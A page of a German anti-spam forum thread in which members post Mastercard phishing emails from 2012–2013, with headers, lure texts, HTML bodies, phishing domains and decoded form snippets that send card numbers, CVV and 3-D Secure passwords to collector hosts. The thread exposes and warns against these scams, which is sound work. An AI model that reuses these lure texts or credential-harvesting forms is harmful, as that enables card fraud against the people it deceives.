Seite 2 von 5 ErsteErste 1234 ... LetzteLetzte
Ergebnis 11 bis 20 von 47

Thema: Mastercard Phishing

  1. #11
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Die 'alten Seilschaften', also Russenmafia und Vlads Hand in Hand kriminell vereint:


    header:
    01: Received: from n177.navy.fastwebserver.de (EHLO
    02: n177.navy.fastwebserver.de) [217.79.179.177]
    03: by mx0.gmx.net (mx028) with SMTP; 25 Jun 2012 xx:xx:xx +0200
    04: Received: from [217.79.179.177] ([127.0.0.1]) by
    05: n177.navy.fastwebserver.de with Microsoft SMTPSVC(7.5.7600.16385);
    06: Mon, 25 Jun 2012 xx:xx:xx +0200

    Sehr geehrter MasterCard-Kunde,

    Sehr geehrter Mastercard Kunde,
    viele unserer Kunden wurden in letzter Zeit Opfer sogenannter
    /"Skimming-Attacken"/. Bei /"Skimming"/ werden Automaten manipuliert (indem
    z.B.: das Tastenfeld mit Kameras ausgestattet wird) und alle
    eingegebenen Daten
    aufgezeichnet.
    Wir bei Mastercard fühlen uns nun verpflichtet, dieser Attacke entgegen
    zu wirken.
    Wir werden neue Sicherheitsmaßnahmen wie zum Beispiel /"Velocity
    Checks"/, das
    sind Überprüfungen auf ein Monats / Tages / Jahreslimit an
    Transaktionen, für
    diese ihre Kreditkarte maximal zulässig ist.
    Durch diese - und viele weitere Maßnahmen - werden wir den Betrügern das
    Handwerk schwerer und ihre Online- und Offlinezahlungen noch sicherer
    machen.
    Jedoch benötigen wir ihre Kooperation. Damit wir diese Maßnahmen umsetzen
    können, muss jeder Karteninhaber seine Kreditkarte /verifizieren/, sonst
    wird
    diese nach einigen Wochen _deaktiviert_. So stellen wir fest, wer schon
    ofter
    solcher Betrüger wurde und wer seine Kreditkarte noch selbst nutzt.
    Wir entschuldigen ihnen die Unannehmlichkeiten,
    MasterCard Germany.

    Zur Datenverifikation
    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 37.221.161.98 ---> lh19307.limehost.ro/Voxility/XALARA Ltd

    Dort lauert noch:

    Code:
    kundensicherheit-online.info	  	 
    ns1.kundensicherheit-online.info	  	 
    ns2.kundensicherheit-online.info	  	 
    mail.kundensicherheit-online.info	  	 
    www.kundensicherheit-online.info	  	 
    sicherheit-packstation.info	  	 
    40340652.packstation-kundendienst.info	  	 
    39155294.packstation-kundendienst.info	  	 
    41438836.packstation-kundendienst.info	  	 
    40774108.packstation-kundendienst.info	  	 
    ns1.kundensicherheit-online.net	  	 
    ns2.kundensicherheit-online.net	  	 
    32481777.kundensicherheit-online.net
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #12
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard

    Und noch ein Versuch

    Sehr geehrte(r) xxxxx ,

    aufgrund sicherheitstechnischer Mängeln in diversen größeren Onlineshops in Deutschland, sind wir gezwungen, unsere Kunden einer Kartenverifizierung zu unterziehen. Diese Verifizierung dient zu Ihrer eigenen Sicherheit und sollte binnen 24 Stunden, nach Erhalt dieser Email, erfolgen, da wir sonst dazu gezwungen sind, Ihre Kreditkarte vorübergehend zu deaktivieren.
    Um zur Kartenverifizierung zu gelangen, folgen Sie diesem ink:
    https://ssl.mastercard.com/de/veri[whois: [Link nur für registrierte Mitglieder sichtbar. ]]

    Wir bitten Sie um Ihr Verständnis.
    Harald Fischer
    Representative Office Germany
    Mastercard Sicherheitsteam Deutschland
    Hier der Mailheader:


    header:
    01: Return-Path: mastercard [at] kreditkarten-info.de
    02: Received: from h1690250.stratoserver.net ([81.169.172.23]) by mx-ha.web.de
    03: (mxweb006) with ESMTP (Nemesis) ID: [ID filtered]
    04: Received: (qmail 11454 invoked from network); 24 Jul 2012 xx:xx:xx +0200
    05: Received: from puck296.server4you.de (HELO puck296) (85.25.246.10) by
    06: h1690250.stratoserver.net with ESMTPA; 24 Jul 2012 xx:xx:xx +0200
    07: From: MasterCard® <mastercard [at] kreditkarten-info.de>
    08: Subject: Mastercard Sicherheitshinweis, XXXXX
    09: To: poor [at] spamvictim.tld
    10: Content-Type: multipart/alternative;
    11: boundary="XydjZu6I693666QueqxAyovlyspuA9=_r8"
    12: MIME-Version: 1.0
    13: Reply-To: mastercard [at] kreditkarten-info.de
    14: Date: Tue, 24 Jul 2012 xx:xx:xx +0200
    15: Priority: urgent
    16: X-Priority: 1
    17: Message-ID: [ID filtered]
    18: Envelope-To: <poor [at] spamvictim.tld>
    19: X-UI-Filterresults: ;V01:K0:1Yfzclag:C/jD1yQTBlI5v8UuFQQ+pLJJ4/4hjB8h3JV
    20: lNg4trjEkZi7FyqyKD5v+UQWrcdeadfCyiwtjXU664UlgsrNAG9qtg58BQjfhA2EeICjAiz
    21: SSmh7ETn1CKwNggvbuMOcLzFhBtS3BgWQEmvsaJk9psB46oGY0AVUy7QVuiIFNF8w=

  3. #13
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard


    header:
    01: x-store-info:sbevkl2QZR7OXo7WID5ZcVBK1Phj2jX/
    02: Authentication-Results: hotmail.com; sender-id=none (sender IP is 77.92.64.33)
    03: header.from=schutz [at] master-europacard.info; dkim=none header.d=master-europacard.info;
    04: x-hmca=none
    05: X-SID-PRA: schutz [at] master-europacard.info
    06: X-DKIM-Result: None
    07: X-Message-Status: n:0:n
    08: X-SID-Result: None
    09: X-AUTH-Result: NONE
    10: X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0xO0Q9MTtHRD0xO1NDTD0x
    11: X-Message-Info:
    12: NhFq/7gR1vQieC3IQvGPiwp81Cbdz8xUruVbQmizQokT+KyGyFw7LglM0LMUOu0pDDTVob0CTBNvfxVW97ZPOHKKhyXZaS
    13: gV6kAUOOF0xf51L6zqGHek/L8ptUh9aEX4XpT6xJCOns=
    14: Received: from ds56667.dedicated.interdns.co.uk ([77.92.64.33]) by
    15: SNT0-MC3-F41.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
    16: Thu, 2 Aug 2012 xx:xx:xx -0700
    17: Received: (qmail 18189 invoked from network); 2 Aug 2012 xx:xx:xx -0000
    18: Received: from unknown (127.0.0.1)
    19: by 0 with QMQP; 2 Aug 2012 xx:xx:xx -0000
    20: To: poor [at] spamvictim.tld
    21: Subject: Betreff: Neue Datenbestimmungen Ihrer Master.Card erfordern Ihr
    22: Handeln! 02. August 2012
    23: X-PHP-Originating-Script: 1256:sett.php
    24: From: <schutz [at] master-europacard.info>
    25: Reply-To:
    26: MIME-Version: 1.0
    27: Content-Type: text/html
    28: Content-Transfer-Encoding: 8bit
    29: Date: Thu, 02 Aug 2012 xx:xx:xx +0100
    30: X-Host-Account: cafegalle
    31: X-Host-Domain: galleriarestaurant.masterhosting3000.com
    32: X-Host-Script:
    33: /domains/g/a/galleriarestaurant.masterhosting3000.com/public_html/wp-content/plugins/sett.php
    34: X-Host-Server: 77.92.64.33
    35: X-Host-Client: 88.80.2.77
    36: Return-Path: schutz [at] master-europacard.info
    37: Message-ID: [ID filtered]
    38: X-OriginalArrivalTime: 02 Aug 2012 xx:xx:xx.0376 (UTC)
    39: FILETIME=[DFDB3700:01CD70F0]

    Sehr geehrter Karteninhaber,

    seit dem 01.08.2012 sind wir als Kreditkartenanbieter dazu verpflichtet, die Identität unserer Kunden festzustellen.
    Deshalb müßen wir Sie dazu auffordern, Ihre Daten mit den unseres Systems abzugleichen.
    Um dieses Verfahren erfolgreich durchzuführen, können Sie die Daten mithilfe eines von uns gestellten Formulares online übermitteln.
    Dieses Formular ist über den folgenden Link verfügbar:

    ----- Formular zur Feststellung der Echtheit Ihrer Daten... (bitte klicken) -----
    whois: [Link nur für registrierte Mitglieder sichtbar. ]/wp-content/themes/twentyten/*********2/************************************

    Wir danken für Ihr Verständnis.
    Ihre persönliche ID: ***********************************

    Hochstraße 2
    60389 Frankfurt am Main
    Telefon: +49 12 14 13 11 0
    Telefax: +49 13 12 14 12 1
    DE

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    Gesammelt wird hier:
    Code:
     <form action="http://bestaetigung-danke.w2c.ru/******9841289483895123******/transfer.php" method="post"
    Geändert von carkiller08 (02.08.2012 um 23:30 Uhr)

  4. #14
    Senior Mitglied
    Registriert seit
    28.02.2007
    Ort
    Wounded Knee
    Beiträge
    1.523

    Standard

    Heute aufgeschlagen, dabei habe ich gar keine Mastercard


    header:
    01: Delivered-To: poor [at] spamvictim.tld
    02: Received: by 10.76.174.105 with SMTP ID: [ID filtered]
    03: Sun, 12 Aug 2012 xx:xx:xx -0700 (PDT)
    04: Received: by 10.180.97.106 with SMTP ID: [ID filtered]
    05: Sun, 12 Aug 2012 xx:xx:xx -0700 (PDT)
    06: Return-Path: <rainkanhan [at] gmx.de>
    07: Received: from mailout-de.gmx.net (mailout-de.gmx.net. [213.165.64.23])
    08: by mx.google.com with SMTP ID: [ID filtered]
    09: Sun, 12 Aug 2012 xx:xx:xx -0700 (PDT)
    10: Received-SPF: pass (google.com: domain of rainkanhan [at] gmx.de designates 213.165.64.23 as
    11: permitted sender) client-ip=213.165.64.23;
    12: Authentication-Results: mx.google.com; spf=pass (google.com: domain of
    13: rainkanhan [at] gmx.de designates 213.165.64.23 as permitted sender) smtp.mail=rainkanhan [at] gmx.de
    14: Received: (qmail 12954 invoked by UID: [UID filtered]
    15: Return-Path: <www-data [at] server12.publicompserver.de>
    16: Delivered-To: GMX delivery to poor [at] spamvictim.tld
    17: Received: (qmail invoked by alias); 12 Aug 2012 xx:xx:xx -0000
    18: Received: from server32.publicompserver.de (EHLO server12.publicompserver.de)
    19: [92.43.107.120]
    20: by mx0.gmx.net (mx076) with SMTP; 12 Aug 2012 xx:xx:xx +0200
    21: Received: by server12.publicompserver.de (Postfix, from userID: [ID filtered]
    22: ID: [ID filtered]
    23: To: poor [at] spamvictim.tld
    24: Subject: MasterCard hat ein neues Vorsorgesystem entwickelt, dass diesen Missbrauch
    25: vorbeugt.
    26: From: Eurokartensysteme Sicherheitsteam <Frankfurter [at] service.com>
    27: Date: Sun, 12 Aug 2012 xx:xx:xx +0200

    Sehr geehrter Karteninhaber, sehr geehrte Karteninhaberin,


    mit Bedauern muessen wir Ihnen die temporaere Aussetzung Ihrer Kreditkarte mitteilen.

    Der Grund hierfuer sind die neuen Sicherheitsrichtlinien, welche fuer jeden unserer Kunden geltend sind und bestaetigt werden muessen.

    Unsere Mitarbeiter aus dem Bereich der Kundenbetreuung und Sicherheit haben festgestellt, dass Sie noch keine Verifizierung Ihrer Kreditkarte durchgefuehrt haben.

    Solange Sie die Verifizierung nicht durchgefuehrt haben, wird es uns nicht moeglich sein Ihre Kreditkarte freizuschalten.

    Wenn Sie jedoch nicht auf den Service von Mastercard verzichten moechten und Ihre Kreditkarte weiterhin reibungslos und sicher nutzen wollen, haben Sie die Moeglichkeit eine Verifizierung durchzufuehren.

    Mit diesem Verfahren schalten Sie Ihre Kreditkarte unverzueglich wieder vollstaendig frei.

    Hierzu besuchen Sie die unten aufgefuehrte Seite, auf welcher Sie ein Formular vorfinden.
    Tragen Sie dort Ihre Daten ein und vergewissern Sie sich nochmals, dass diese korrekt eingetragen wurden.
    Weitere Informationen zu Ihrer Sicherheit und zur Verifizierung finden Sie selbstverstaendlich auf der folgenden Seite:

    http://www.serviceinformationsservice.de/

    Sicherheit und Datenschutz



    Herzlichen Dank fuer Ihr Verstaendnis

    Harald Fischer
    Mastercard Sicherheitsteam Deutschland

  5. #15
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard

    Code-Auszug aus whois: [Link nur für registrierte Mitglieder sichtbar. ]index.htm

    Code:
    frame src="http://cesars-secrets-shop.at/images/banner/m/index.htm" title="Debit"
    ...ist schon nicht (mehr ?) erreichbar .

  6. #16
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard Man fisht mal wieder

    Hallo,

    vorige Woche hats mals wieder gespamt. Sieht ziemlich offiziell aus.

    Nur:

    Bin ich nicht bei dieser Service-Firma, falls sie überhaupt existiert. Und außerdem wäre ich ein bisschen beleidigt, wenn meine Service Firma mich mit Herr Isenächer anreden würde.

    "Deitsche" Rechtschreibung scheint auch nicht deren Stärke zu sein.


    header:
    01: Return-Path: <ich_und_keinanderer [at] web.de>
    02: Delivered-To: GMX delivery to poor [at] spamvictim.tld
    03: Received: (qmail invoked by alias); 28 Oct 2012 xx:xx:xx -0000
    04: Received: from mout.web.de (EHLO mout.web.de) [212.227.15.4] nicht
    05: by mx0.gmx.net (mx066) with SMTP; 28 Oct 2012 xx:xx:xx +0100
    06: Received: from card.com ([123.243.122.186]) by mx-ha.web.de (mxweb006) with
    07: ESMTP (Nemesis) ID: [ID filtered]
    08: 2012 xx:xx:xx +0100
    09: Reply-To: <serv [at] card.com>
    10: From: "MasterCard SPRL" <serv [at] card.com>
    11: Subject: *** GMX Spamverdacht *** Ihre Mastercard-Kreditkarte wurde soeben gesperrt
    12: Date: Sun, 28 Oct 2012 xx:xx:xx +0100
    13: MIME-Version: 1.0
    14: Content-Type: text/html;
    15: charset="Windows-1250"
    16: Content-Transfer-Encoding: 7bit
    17: X-Priority: 3
    18: X-MSMail-Priority: Normal
    19: X-Mailer: Microsoft Outlook Express 5.50.4522.1200
    20: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
    21: Message-ID: [ID filtered]
    22: X-GMX-Antivirus: 0 (no virus found)
    23: X-GMX-Antispam: 5 (BackTrace mail analyze);
    24: Detail=5D7Q89H36p4L00VTXC6D4q0N+AH0PUCnGL2vqOgpaBYL16oitsMrgDt/NQNpSCZF7bt5n
    25: WT2HM1clGN9oXP8KI4QRzX6Mvmr92doQayvPnZgPyuJ0IawAw==V1;

    Sehr geehrter Mastercard-Kunde,

    wir bedauern, Ihnen mitteilen zu müssen, dass ihre Kreditkarte aus Sicherheitsgründen gesperrt wurde.
    Um Sie gegen den Missbrauch ihrer Kreditkarte zu bewahren, hat "MasterCard Europe SPRL" neue Sicherheitsmaßnahmen eingeführt.

    Um diese Sicherheitsmaßnahmen zu aktivieren und gleichzeitig ihre Kreditkarte zu entsperren, bitten wir Sie, das nachfolgende Formular auf unserer Webseite auszufüllen.


    whois: [Link nur für registrierte Mitglieder sichtbar. ]


    Bitte beachten Sie, dass ihre Kreditkarte solange gesperrt bleibt, bis Sie das Formular vollständig ausgefüllt haben und dieses erfolgreich von einem Mitarbeiter geprüft wurde.
    Dies kann im Normalfall bis zu 24 Stunden dauern.


    Wir bedanken uns für Ihr Verständniss und möchte noch einmal beteuern, dass dieser Vorgang ausschliesslich zu Ihrer eigenen Sicherheit vollzogen wird.


    Mit freundlichen Grüßen,

    MasterCard Europe SPRL
    Representative Office Germany
    Unterschweinstiege 2-14
    60549 Frankfurt/Main
    Deutschland
    Telefon: +49 (0)69 97 12 10 0
    Telefax: +49 (0)69 97 12 10 10
    und jetzt auch noch mal mit Text in HTML


    header:
    01: Return-Path: <wiedermalich [at] web.de>
    02: Delivered-To: GMX delivery to poor [at] spamvictim.tld
    03: Received: (qmail invoked by alias); 29 Oct 2012 xx:xx:xx -0000
    04: Received: from mout.web.de (EHLO mout.web.de) [212.227.15.4]
    05: by mx0.gmx.net (mx063) with SMTP; 29 Oct 2012 xx:xx:xx +0100
    06: Received: from orza.sable-dart.com ([83.156.244.104]) by mx-ha.web.de
    07: (mxweb001) with ESMTP (Nemesis) ID: [ID filtered]
    08: <undauchich [at] gmx.de>; Mon, 29 Oct 2012 xx:xx:xx +0100
    09: Received: (qmail 12776 invoked by UID: [UID filtered]
    10: Date: 28 Oct 2012 xx:xx:xx -0000
    11: Message-ID: [ID filtered]
    12: To: poor [at] spamvictim.tld
    13: Subject: *** GMX Spamverdacht *** Ihre Mastercard-Kreditkarte wurde soeben gesperrt
    14: From: MasterCard Datenabgleich <serv [at] card.com>
    15: Reply-To: serv [at] card.com
    16: MIME-Version: 1.0
    17: X-GMX-Antivirus: 0 (no virus found)
    18: X-GMX-Antispam: 5 (BackTrace mail analyze);
    19: Detail=5D7Q89H36p4L00VTXC6D4q0N+AH0PUCnGL2vqOgpaBYL16oitsMrgDt/NQNpSCZF7bt5n
    20: WT2HM2t+tArSXAcgZQPshNbZEKwNDFra3KkiJUT72IAdZIxhw==V1;
    21: Content-Type: text/html
    22: Content-Transfer-Encoding: 8bit

    [HTML]<html><body>



    <font face="Arial" size="2">Guten Tag sehr geehrter Mastercard Kunde ,

    </font>





    <p><font face="Arial" size="2">

    <br>

    Mastercard teilt ihnen die vorübergehende Sperrung ihrer Kreditkarte mit.<br>

    Aufgrund der neuen Sicherheitsbestimmungen, sind wir verpflichtet eine Prüfung

    einzuleiten.<br>

    <br>

    Aus unseren Dokumenten ist zu entnehmen, dass bei ihnen diese Prüfung bisher

    ausblieb.<br>

    Wir schließen die Möglichkeit zur Freischaltung der Kreditkarte bei dem

    Ausbleiben einer Prüfung aus.<br>

    <br>

    Die Durchführung einer solchen Prüfung ist auf der Webseite von Mastercard

    möglich.<br>

    Dieses Verfahren schaltet ihre Kreditkarte sofort frei.<br>

    Dieses Verfahren ist kostenlos und dient ausschließlich ihrer Sicherheit .<br>

    <br>

    Der Link zur Verifizierung ist weiter unten aufgeführt.<br>

    <br>

    Auf dieser Seite befindet sich ein Formular, welches den Eintrag ihrer Daten

    erfordert.<br>

    Nachdem die Überprüfung ihrer Daten abgeschlossen ist, erfolgt die Freischaltung

    ihrer Kreditkarte .<br>

    <br>



    <br>

    <a href="http://bistrotdesvignes.com/german/i.php">http://www.mastercard.com/de/privatkunden/service/index.shtm</a></div>

    <br>

    <br>

    Weitere Informationen befinden sich auf der Webseite von Mastercard.<br>

    <br>

    Viel Vergnügen mit ihrer Mastercard und einen schönen Tag wünscht ihnen :<br>

    <br>

    Jeanette Wolfgang ( Mitarbeiterin der Abteilung für Kundensicherheit und

    Kundenbetreung )<br>

    <br>

    MasterCard Europe<br>

    <br>

    </font><font face="Arial" size="1">

    Representative Office Germany / Kundenservice / Mastercard Security<br>

    Unterschweinstiege 2-14<br>

    60549 Frankfurt/Main<br>

    Deutschland<br>

    Telefon: +49 (0)39 97 13 110 0<br>

    Telefax: +49 (0)39 97 13 11 10</span></span></font></p>



    </body></html>
    [/HTML]

    Leute, solange Ihr nicht meinen vollständigen Namen herausbekommt, nehme ich Euch auch nicht ernst

    Gruß

    Isenächer

  7. #17
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    isch 'abe gar kein Mastercard....


    header:
    01: Received: from msk2.imhoster.net ([91.204.73.135]) by mx-ha.gmx.net
    02: (mxgmx013)
    03: with ESMTP (Nemesis) ID: [ID filtered]
    04: Feb 2013 xx:xx:xx +0100
    05: Received: from nobody by msk2.imhoster.net with local (Exim 4.80)
    06: (envelope-from <nobody [at] msk2.imhoster.net>)
    07: ID: [ID filtered]
    08: for xxxxx; Wed, 20 Feb 2013 xx:xx:xx +0400

    X-PHP-Script: evroluks.lg.ua/wp-content/uploads/updater.php for
    213.163.65.50

    Da ahnt man doch, woher es stammt...

    KUNDE: [mein Name]
    HEADER-ID: 1201851753

    Guten Tag sehr geehrte/r [mein Name],

    Es freut uns Sie als einen Kunden unseres Unternehmens über die aktuellsten
    Security Updates informieren zu dürfen.
    Am 01.02.2013 wurden die Regelungen beim Zahlungsverkehr zwischen uns
    und den
    Händlern, welche unsere Zahlungsdienstleistungen in Anspruch nehmen,
    erneuert.
    Aus diesem Grund war jeder unserer Kunden zu einer einmaligen Prüfung
    seiner
    persöblichen Informationen durch unsere Mitarbeiter der
    Sicherheitsabteilung
    eingeladen.
    Um das System und die Benutzung der Kreditkarte durch Sie ebenfalls so
    sicher
    wie möglich zu gestalten, muss von Ihnen der verpasste Sicherheitsprozess
    nachgeholt werden.
    In diesem Zusammenhang wurde der Transfer von finanziellen Mitteln
    eingestellt.
    Im Zuge dessen können Sie Ihre Kreditkarte nur in dem Fall benutzen,
    wenn diese
    Blockierung aufgehoben ist.
    Um von Zuhause den Prozess so einfach wie möglich abschließen, werden
    Sie auf
    der von uns unten aufgeführten und SSL-gesicherten, offiziellen Webseite
    Ihre
    Daten für eine Prüfung eintragen müssen.
    In der Regel dauert eine solche Prüfung zwischen 1-3 Werktagen, kann
    jedoch in
    Einzelfällen durch das System automatisch erfolgen.
    Nachfolgend finden Sie den Gateway zum Sicherheitsprozess aufgeführt.


    Mit der Aktivierung beginnen
    whois: [Link nur für registrierte Mitglieder sichtbar. ]


    * Klicken Sie auf "Kreditkarte entsperren"

    * Füllen Sie das Formular ordnungsgemäß aus

    * Legen Sie zusätzliche Optionen fest, welche Ihre Sicherheit betreffen.
    IP: 66.96.147.115 ---> 115.147.96.66.static.eigbox.net

    Erstaunlich, dass hier mal wieder eine GMX-Adresse (die ich kaum nutze), mit meinem richtigen Name verknüpft wurde. Und der Text ist zumindestens nicht grottenschlecht formuliert, jedenfalls kein automatischer Übersetzer, sondern da war jemand mit halbwegs guten Deutschkenntnissen am Werke.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  8. #18
    Ritter der Tafelrunde Avatar von Arthur
    Registriert seit
    15.01.2007
    Ort
    Avalon
    Beiträge
    13.392

    Standard

    [Link nur für registrierte Mitglieder sichtbar. ]
    Eine Mastercard-Phishing-Mail gaukelt den Opfern die Umstellung auf smsTAN-Verfahren vor und lotst sie auf eine nahezu perfekt nachempfundene Mastercard-Seite. Die im fehlerfreien Deutsch geschriebenen Spam-Mails, die im Namen der Firmen Otto und Görtz im Umlauf sind, drohen mit Mahngebühren und transportieren Trojaner im Anhang. Allen Betrugsmails ist eines gemeinsam: Sprachlich sind keine Mängel mehr festzustellen

  9. #19
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Wieder von denselben Ganoven:


    header:
    01: Received: from cpiticm.vhost.interdominios.com ([89.248.103.28]) by
    02: mx-ha.gmx.net (mxgmx109) with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from cpiticm.vhost.interdominios.com (localhost.localdomain
    04: [127.0.0.1]) by cpiticm.vhost.interdominios.com (Postfix) with ESMTP ID: [ID
    05: filtered]
    06: Received: from User (208-40-110-196.ipv4.firstcomm.com [208.40.110.196]) by
    07: cpiticm.vhost.interdominios.com (Postfix) with ESMTP; Mon, 26 Aug 2013 xx:xx:xx +0200 (CEST)

    IP: 208.40.110.196

    Man vergleiche bitte mit:

    [Link nur für registrierte Mitglieder sichtbar. ]


    Sehr geehrte Kundin ,
    sehr geehrter Kunde ,

    Unser Sicherheitssystem hat einen Fehler im Kreditkarte.
    Um unser dienstleistungen noch sicherer zu machen und missnbräuchliche
    Verwendungen zu vermeiden,
    ist eine Aktualisierung Ihres karte Informationen notwendig.


    Aktualisierung Ihres karte Informationen notwendig können Sie hier
    ändern, gehen
    Sie wie folgt vor.

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus in klicken Sie dann auf "Verifizieren"!



    Mit freundlichen Grüßen

    © 1994-2013 MasterCard.
    Im HTML-Anhang dann:

    [HTML]<form action="http://www.cestim.net/css/.../neu.php" method="post">[/HTML]

    IP: 178.63.105.148 ---> static.148.105.63.178.clients.your-server.de/Hetzner

    Hetzner, das sagt schon alles....
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #20
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard


    header:
    01: Received: from printesolution.printesolution.com ([173.193.65.167]) by
    02: COL0-MC3-F12.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
    03: Thu, 29 Aug 2013 xx:xx:xx -0700
    04: Received: from visa-master.de (UnknownHost [109.75.163.62]) by
    05: printesolution.printesolution.com with SMTP;
    06: Thu, 29 Aug 2013 xx:xx:xx -0400
    07: To: poor [at] spamvictim.tld
    08: Subject: Sicherheitsmaßnahme! Bitte überprüfen Sie Ihre Kreditkarte
    09: Date: 29 Aug 2013 xx:xx:xx +0100
    10: Message-ID: [ID filtered]
    11: MIME-Version: 1.0
    12: Content-Type: multipart/mixed;
    13: boundary="----=_NextPart_000_0012_576B4795.8A500DC0"
    14: From: kreditkarte [at] visa-master.de

    Der Inhalt der Mail ist ein an mehreren Stellen verschlüsseltes html-Formular namens " Sicherheit2013.html "
    inkl. javascript.

    Aus Sicherheitsgründen,

    laden Sie sich bitte und füllen Sie das beigefügte Formular.

    /> Copyright © 1999-2013. Alle Rechte vorbehalten.

    --Weitergeleitete E-Mail-Anlagen--

    NOTE:
    This form requires Javascript.
    You either have Javascript disabled or you are using an old browser which does not support Javascript.
    Please enable Javascript or open this form in a browser which supports Javascript.

    Stellen Sie Ihre Kreditkarte

    Secure .

    .Bitte f�Sie alle Felder aus.

    Name (Vorname Nachname)

    Kreditkartennummer
    (16 Ziffern, keine Leerzeichen oder Bindestriche)

    G�bis

    --Month--01 (Jan)02 (Feb)03 (Mar)04 (Apr)05 (May)06 (Jun)07 (Jul)08 (Aug)09 (Sep)10 (Oct)11 (Nov)12 (Dec)--Year--20132014201520162017201820192020202120222023202420252026202720282029203020312032

    CVV2 Pr�er Warum?

    Verified by Visa or Mastercard SecureCode
    (3-D Secure password)

    Geburtsdatum
    TT ..........MM ........JJJJ
    / /

    Straޥ und Hausnummer

    Ort / Stadt

    PLZ

    Telefonnummer

    Kontonummer

    Bankleitzahl
    (keine Bindestriche und Leerzeichen)

    jetzt wiederherstellen

    Copyright © 1999-2013 . Alle Rechte vorbehalten.
    Ein externer Decoder brachte folgendes zu Tage:

    Code:
    form name="raf" action="http://makula-tcm.de/load.php" method="post" onsubmit="return validate(this)"><input type="hidden" name="redir" value="https://www.paypal.com/"
    whois:makula-tcm.de

    Code:
    img src="http://www.32red.com/images/banking/3d-secure-logos.png"
    %2=0alt="PayPal" border="0" h=eight="50" width="200"> <%=62r /
    Geändert von carkiller08 (29.08.2013 um 23:35 Uhr)

Seite 2 von 5 ErsteErste 1234 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen